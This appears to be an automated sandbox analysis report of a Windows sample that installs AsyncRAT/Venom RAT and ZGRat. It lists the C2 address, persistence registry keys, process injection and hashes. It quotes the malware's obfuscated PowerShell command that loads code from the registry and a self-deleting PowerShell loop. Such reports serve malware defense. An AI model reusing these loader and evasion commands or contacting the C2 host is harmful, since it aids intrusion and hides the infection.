Analysis
-
max time kernel
150s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
10-05-2024 07:11
Static task
static1
Behavioral task
behavioral1
Sample
9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe
Resource
win10v2004-20240508-en
General
-
Target
9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe
-
Size
1.5MB
-
MD5
9c0f25deda5fd180238008b7b97fab10
-
SHA1
f65d5a0b184c6bc0866ea214b2dbe37135eb6f9c
-
SHA256
78ce536df6722793cde9eca1bc9f78bc4abe3d17613eb950401c1fbc0335142c
-
SHA512
6d5c2a12818e8f6b6e0260ef81c18409c9b4319fff3ec7000ccf5b6dfa29b933ccfadcc414f8af83d3ca2c3f7def5f52f1ca649c698691c742e3559a0fb317b3
-
SSDEEP
24576:8NNGBDaQ3lPIiTr9befL/s20Z7RMnaGq3Lpu/ukPew0t4OH6Lwu69wYzGXIgA/H7:/lVwzl0Z7zGq7ptw0t9RfP
Malware Config
Extracted
asyncrat
5.0.5
Venom Clients
blue.o7lab.me:4449
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
-
delay
10
-
install
true
-
install_file
pop3.exe
-
install_folder
%Temp%
Signatures
-
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral1/memory/1796-27-0x000000001B830000-0x000000001B932000-memory.dmp family_zgrat_v1 -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2072 created 428 2072 powershell.EXE 5 -
Async RAT payload 2 IoCs
resource yara_rule behavioral1/memory/2292-26-0x0000000000410000-0x0000000000452000-memory.dmp family_asyncrat behavioral1/memory/2292-36-0x000000000BA40000-0x000000000BA56000-memory.dmp family_asyncrat -
Deletes itself 1 IoCs
pid Process 2644 powershell.exe -
Executes dropped EXE 4 IoCs
pid Process 556 O7BOT.exe 1796 svchost.exe 2292 VENOM.exe 1588 Install.exe -
Loads dropped DLL 9 IoCs
pid Process 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 2292 VENOM.exe 3024 WerFault.exe 3024 WerFault.exe 3024 WerFault.exe 3024 WerFault.exe 3024 WerFault.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\Audio HD Driver = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinUpdate.exe" O7BOT.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2072 set thread context of 2876 2072 powershell.EXE 39 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3024 2292 WerFault.exe 30 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 O7BOT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier O7BOT.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e018c640a9a2da01 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2644 powershell.exe 2072 powershell.EXE 2072 powershell.EXE 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe 2876 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 556 O7BOT.exe Token: SeDebugPrivilege 2072 powershell.EXE Token: SeDebugPrivilege 2072 powershell.EXE Token: SeDebugPrivilege 2876 dllhost.exe Token: SeDebugPrivilege 1796 svchost.exe Token: SeAuditPrivilege 848 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2216 wrote to memory of 556 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 28 PID 2216 wrote to memory of 556 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 28 PID 2216 wrote to memory of 556 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 28 PID 2216 wrote to memory of 556 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 28 PID 2216 wrote to memory of 1796 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 29 PID 2216 wrote to memory of 1796 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 29 PID 2216 wrote to memory of 1796 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 29 PID 2216 wrote to memory of 1796 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 29 PID 2216 wrote to memory of 2292 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 30 PID 2216 wrote to memory of 2292 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 30 PID 2216 wrote to memory of 2292 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 30 PID 2216 wrote to memory of 2292 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 30 PID 2216 wrote to memory of 2644 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 31 PID 2216 wrote to memory of 2644 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 31 PID 2216 wrote to memory of 2644 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 31 PID 2216 wrote to memory of 2644 2216 9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe 31 PID 2292 wrote to memory of 1588 2292 VENOM.exe 34 PID 2292 wrote to memory of 1588 2292 VENOM.exe 34 PID 2292 wrote to memory of 1588 2292 VENOM.exe 34 PID 2292 wrote to memory of 1588 2292 VENOM.exe 34 PID 2292 wrote to memory of 1588 2292 VENOM.exe 34 PID 2292 wrote to memory of 1588 2292 VENOM.exe 34 PID 2292 wrote to memory of 1588 2292 VENOM.exe 34 PID 2292 wrote to memory of 3024 2292 VENOM.exe 35 PID 2292 wrote to memory of 3024 2292 VENOM.exe 35 PID 2292 wrote to memory of 3024 2292 VENOM.exe 35 PID 2292 wrote to memory of 3024 2292 VENOM.exe 35 PID 2140 wrote to memory of 2072 2140 taskeng.exe 37 PID 2140 wrote to memory of 2072 2140 taskeng.exe 37 PID 2140 wrote to memory of 2072 2140 taskeng.exe 37 PID 2072 wrote to memory of 2876 2072 powershell.EXE 39 PID 2072 wrote to memory of 2876 2072 powershell.EXE 39 PID 2072 wrote to memory of 2876 2072 powershell.EXE 39 PID 2072 wrote to memory of 2876 2072 powershell.EXE 39 PID 2072 wrote to memory of 2876 2072 powershell.EXE 39 PID 2072 wrote to memory of 2876 2072 powershell.EXE 39 PID 2072 wrote to memory of 2876 2072 powershell.EXE 39 PID 2072 wrote to memory of 2876 2072 powershell.EXE 39 PID 2072 wrote to memory of 2876 2072 powershell.EXE 39 PID 2876 wrote to memory of 428 2876 dllhost.exe 5 PID 2876 wrote to memory of 472 2876 dllhost.exe 6 PID 2876 wrote to memory of 488 2876 dllhost.exe 7 PID 2876 wrote to memory of 496 2876 dllhost.exe 8 PID 2876 wrote to memory of 596 2876 dllhost.exe 9 PID 2876 wrote to memory of 676 2876 dllhost.exe 10 PID 2876 wrote to memory of 748 2876 dllhost.exe 11 PID 2876 wrote to memory of 812 2876 dllhost.exe 12 PID 2876 wrote to memory of 848 2876 dllhost.exe 13 PID 2876 wrote to memory of 960 2876 dllhost.exe 15 PID 2876 wrote to memory of 276 2876 dllhost.exe 16 PID 2876 wrote to memory of 1004 2876 dllhost.exe 17 PID 2876 wrote to memory of 1072 2876 dllhost.exe 18 PID 2876 wrote to memory of 1080 2876 dllhost.exe 19 PID 2876 wrote to memory of 1152 2876 dllhost.exe 20 PID 2876 wrote to memory of 1200 2876 dllhost.exe 21 PID 2876 wrote to memory of 804 2876 dllhost.exe 23 PID 2876 wrote to memory of 1288 2876 dllhost.exe 24 PID 2876 wrote to memory of 2148 2876 dllhost.exe 25 PID 2876 wrote to memory of 556 2876 dllhost.exe 28 PID 2876 wrote to memory of 1796 2876 dllhost.exe 29 PID 2876 wrote to memory of 2292 2876 dllhost.exe 30 PID 2876 wrote to memory of 2052 2876 dllhost.exe 33 PID 2876 wrote to memory of 3024 2876 dllhost.exe 35 PID 2876 wrote to memory of 2140 2876 dllhost.exe 36 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:428
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7fa4e402-8564-4555-8271-496f8e63025d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:596
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:804
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵PID:2052
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:748
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:812
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1152
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:848 -
C:\Windows\system32\taskeng.exetaskeng.exe {E71943FE-33A8-4D3B-9380-2ED8D60848CE} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+'g'+'e'+'r')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2072
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:960
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:276
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1004
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1072
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1080
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1288
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2148
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\O7BOT.exe"C:\Users\Admin\AppData\Local\Temp\O7BOT.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:556
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\VENOM.exe"C:\Users\Admin\AppData\Local\Temp\VENOM.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Users\Admin\AppData\Roaming\Install.exe"C:\Users\Admin\AppData\Roaming\Install.exe"4⤵
- Executes dropped EXE
PID:1588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 10204⤵
- Loads dropped DLL
- Program crash
PID:3024
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $file='C:\Users\Admin\AppData\Local\Temp\9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe';for($i=1;$i -le 600 -and (Test-Path $file -PathType leaf);$i++){Remove-Item $file;Start-Sleep -m 100}3⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1807355002400027821487082641-628697697-1691833429-20167174171463726205109710044"1⤵PID:2972
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
376KB
MD56b9c17340172a6a60b1104628a69f9c6
SHA1db8e387d429b852233dc872b91f7cc9308c703f9
SHA2569c67f5654d96f6399a567bdd70314b0d746bffa8611591d473217e287a46d14e
SHA5126b4e475d23892e4ce646b291222793b8f6fa0f888545ddbebb5fd02bd145212911abf15933888021560a5bf912e03e4b0c37a0b03601be25d691e885d7bc09ef
-
Filesize
631KB
MD59d82dc826bcac1bdd4c41bf79577af27
SHA1c38360ef0e8acb8f34ebe713ab83ce85cf3fe503
SHA256784233bc80ea7857c39dbcd9c929a626093fced8c54224e742c4d0e1d128e80d
SHA5127b863ee39c0e58e91db4fef3bf968c15a595d8de7dbbfd43d56c8b6e2ccdff59aaedc85cdb5d9924128cdf5fc1a77fe9fe36a4dcc4d8fd49da89b6462be1338b
-
Filesize
34KB
MD515df2c3e654cfcf05a461001caa3873f
SHA176755d8f5ca782d87320e031b9b5c1c06c1aa59a
SHA256def50a99856f6c75d6f714b390da7c98ba82ce0280c101c313cc90caf522f011
SHA512b871fc427c5760fe4a37aadc8962c72df331d4daf7d8e50bc3cdd51981db3e0abe92429701d2325d7827ae33d5d289ee52020a8ebb4a49629920f13eeb77ab80
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4